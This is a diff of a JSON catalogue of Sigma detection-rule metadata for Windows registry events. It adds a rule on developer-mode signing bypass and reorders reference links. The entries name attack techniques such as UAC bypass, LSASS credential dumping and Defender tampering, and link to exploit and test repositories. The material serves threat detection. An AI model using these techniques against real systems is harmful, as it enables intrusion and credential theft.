"uuid": "7d995e63-ec83-4aa3-89d5-8a17b5c87c86", "value": "Scripted Diagnostics Turn Off Check Enabled - Registry" }, + { + "description": "Detects when the enablement of developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/12", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_turn_on_dev_features.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/malmoeb/status/1560536653709598721", + "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_turn_on_dev_features.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "b110ebaf-697f-4da1-afd5-b536fa27a2c1", + "value": "Potential Signing Bypass Via Windows Developer Features - Registry" + }, { "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "meta": { @@ -15881,9 +15905,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml" ], "tags": [ @@ -15917,8 +15941,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://persistence-info.github.io/Data/wer_debugger.html", "https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/", + "https://persistence-info.github.io/Data/wer_debugger.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hangs_debugger_persistence.yml" ], "tags": [ @@ -15964,8 +15988,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass", "https://www.exploit-db.com/exploits/47696", + "http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_comhijack_sdclt.yml" ], "tags": [ @@ -16030,8 +16054,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://redcanary.com/blog/blackbyte-ransomware/?utm_source=twitter&utm_medium=social", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/", + "https://redcanary.com/blog/blackbyte-ransomware/?utm_source=twitter&utm_medium=social", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_blackbyte_ransomware.yml" ], "tags": [ @@ -16055,9 +16079,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/", "https://twitter.com/inversecos/status/1494174785621819397", "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_security.yml" ], "tags": [ @@ -16142,8 +16166,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://twitter.com/_vivami/status/1347925307643355138", "https://vanmieghem.io/stealth-outlook-persistence/", + "https://twitter.com/_vivami/status/1347925307643355138", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_office_vsto.yml" ], "tags": [ @@ -16177,10 +16201,10 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml" ], "tags": [ @@ -16262,8 +16286,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", "https://support.microsoft.com/en-us/topic/microsoft-security-advisory-update-to-improve-credentials-protection-and-management-may-13-2014-93434251-04ac-b7f3-52aa-9f951c14b649", + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml" ], "tags": [ @@ -16287,8 +16311,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://twitter.com/dottor_morte/status/1544652325570191361", "https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf", + "https://twitter.com/dottor_morte/status/1544652325570191361", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_fax_dll_persistance.yml" ], "tags": [ @@ -16370,9 +16394,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ + "https://github.com/gtworek/PSBits/tree/master/SIP", "https://persistence-info.github.io/Data/codesigning.html", "https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf", - "https://github.com/gtworek/PSBits/tree/master/SIP", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_sip_persistence.yml" ], "tags": [ @@ -16407,9 +16431,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml" ], "tags": [ @@ -16490,8 +16514,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/", "https://github.com/last-byte/PersistenceSniper", + "https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dbgmanageddebugger_persistence.yml" ], "tags": [ @@ -16581,8 +16605,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.youtube.com/watch?v=3gz1QmiMhss&t=1251s", "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md", + "https://www.youtube.com/watch?v=3gz1QmiMhss&t=1251s", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_treatas_persistence.yml" ], "tags": [ @@ -16638,8 +16662,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://twitter.com/WhichbufferArda/status/1543900539280293889", "https://github.com/DebugPrivilege/CPP/blob/c39d365617dbfbcb01fffad200d52b6239b2918c/Windows%20Defender/RestoreDefenderConfig.cpp", + "https://twitter.com/WhichbufferArda/status/1543900539280293889", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml" ], "tags": [ @@ -16706,8 +16730,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://labs.f-secure.com/blog/scheduled-task-tampering/", "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://labs.f-secure.com/blog/scheduled-task-tampering/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_taskcache_entry.yml" ], "tags": [ @@ -16827,8 +16851,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://persistence-info.github.io/Data/diskcleanuphandler.html", "https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/", + "https://persistence-info.github.io/Data/diskcleanuphandler.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml" ], "tags": [ @@ -17048,10 +17072,10 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://persistence-info.github.io/Data/userinitmprlogonscript.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://persistence-info.github.io/Data/userinitmprlogonscript.html", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml" ], "tags": [ @@ -17166,13 +17190,13 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/", - "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services", - "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", - "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html", - "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/", "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03", "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190407183310.html", + "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/", + "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html", + "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", + "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services", + "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_tampering.yml" ], "tags": [ @@ -17231,9 +17255,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml" ], "tags": [ @@ -17258,9 +17282,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml" ], "tags": [ @@ -17308,8 +17332,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190", "https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cve_2022_30190_msdt_follina.yml" ], "tags": [ @@ -17443,8 +17467,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465", "https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738", + "https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_policies_attachments_tamper.yml" ], "tags": [ @@ -17491,9 +17515,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/", - "https://app.any.run/tasks/77b2e328-8f36-46b2-b2e2-8a80398217ab/", "https://learn.microsoft.com/en-us/windows/win32/api/winevt/", + "https://app.any.run/tasks/77b2e328-8f36-46b2-b2e2-8a80398217ab/", + "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_winevt_channelaccess.yml" ], "tags": [ @@ -17527,9 +17551,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml" ], "tags": [ @@ -17758,9 +17782,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", "https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.WindowsDefender::SpyNetReporting", - "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", "https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_windows_defender_tamper.yml" ], @@ -17785,8 +17809,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md#atomic-test-6---add-root-certificate-to-currentuser-certificate-store", + "https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_install_root_or_ca_certificat.yml" ], "tags": [ @@ -17819,8 +17843,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/hfiref0x/UACME", "https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/", + "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_sdclt.yml" ], "tags": [ @@ -17855,8 +17879,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://persistence-info.github.io/Data/hhctrl.html", "https://www.hexacorn.com/blog/2018/04/23/beyond-good-ol-run-key-part-77/", + "https://persistence-info.github.io/Data/hhctrl.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hhctrl_persistence.yml" ], "tags": [ @@ -18075,8 +18099,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone", + "https://docs.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_security_zones.yml" ], "tags": [ @@ -18203,9 +18227,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml" ], "tags": [ @@ -18254,9 +18278,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml" ], "tags": [ @@ -18313,8 +18337,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://persistence-info.github.io/Data/aedebug.html", "https://docs.microsoft.com/en-us/windows/win32/debug/configuring-automatic-debugging", + "https://persistence-info.github.io/Data/aedebug.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_aedebug_persistence.yml" ], "tags": [ @@ -18362,9 +18386,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml" ], "tags": [ @@ -18388,9 +18412,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ + "https://github.com/deepinstinct/Lsass-Shtinkering", "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", "https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps", - "https://github.com/deepinstinct/Lsass-Shtinkering", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lsass_usermode_dumping.yml" ], "tags": [ @@ -18424,8 +18448,8 @@ "logsource.product": "windows", "refs": [ "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", - "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", + "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dhcp_calloutdll.yml" ], "tags": [ @@ -18483,8 +18507,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://devblogs.microsoft.com/oldnewthing/20100312-01/?p=14623", "https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand", + "https://devblogs.microsoft.com/oldnewthing/20100312-01/?p=14623", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-7---bypass-uac-using-sdclt-delegateexecute", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute.yml" ], @@ -18575,9 +18599,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.slideshare.net/JamieWilliams130/started-from-the-bottom-exploiting-data-sources-to-uncover-attck-behaviors", - "https://www.sans.org/cyber-security-summit/archives", "https://twitter.com/jamieantisocial/status/1304520651248668673", + "https://www.sans.org/cyber-security-summit/archives", + "https://www.slideshare.net/JamieWilliams130/started-from-the-bottom-exploiting-data-sources-to-uncover-attck-behaviors", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml" ], "tags": [ @@ -18728,8 +18752,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://twitter.com/dottor_morte/status/1544652325570191361", "https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf", + "https://twitter.com/dottor_morte/status/1544652325570191361", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_fax_change_service_user.yml" ], "tags": [ @@ -19098,10 +19122,10 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml" ], "tags": [ @@ -19158,8 +19182,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://unit42.paloaltonetworks.com/ransomware-families/", "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanSpy%3aMSIL%2fHakey.A", + "https://unit42.paloaltonetworks.com/ransomware-families/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-1---modify-registry-of-current-user-profile---cmd", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hidden_extention.yml" ], @@ -19191,8 +19215,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", + "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_mal_adwind.yml" ], "tags": [ @@ -19233,8 +19257,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-9---bypass-uac-using-silentcleanup-task", + "https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml" ], "tags": [ @@ -19268,9 +19292,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/", "https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_microsoft_office_security_features.yml" ], "tags": [ @@ -19343,10 +19367,10 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html", - "https://admx.help/HKLM/Software/Policies/Mozilla/Firefox/DNSOverHTTPS", - "https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode", "https://github.com/elastic/detection-rules/issues/1371", + "https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode", + "https://admx.help/HKLM/Software/Policies/Mozilla/Firefox/DNSOverHTTPS", + "https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dns_over_https_enabled.yml" ], "tags": [ @@ -19438,8 +19462,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/MichalKoczwara/status/1553634816016498688", - "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", + "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml" ], "tags": [ @@ -19463,16 +19487,16 @@ "logsource.product": "windows", "refs": [ "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", - "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", - "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", - "https://twitter.com/_xpn_/status/1268712093928378368", "https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/", - "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", - "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", - "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", + "https://twitter.com/_xpn_/status/1268712093928378368", "http://managed670.rssing.com/chan-5590147/all_p1.html", + "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", + "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", + "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", + "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", "https://bunnyinside.com/?term=f71e8cb9c76a", + "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", 